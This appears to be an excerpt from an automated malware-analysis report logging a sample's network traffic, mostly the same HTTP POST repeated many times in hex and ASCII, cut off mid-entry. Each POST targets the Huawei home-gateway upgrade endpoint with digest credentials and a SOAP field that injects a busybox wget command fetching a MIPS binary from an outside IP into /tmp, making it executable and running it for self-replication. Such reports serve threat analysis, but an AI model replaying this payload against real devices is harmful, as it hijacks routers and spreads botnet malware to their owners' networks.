            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.132.122.89:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.2.218.117:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.230.8.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.98.244.39:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.179.150.80:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.240.183.240:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.120.126.5:37215
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 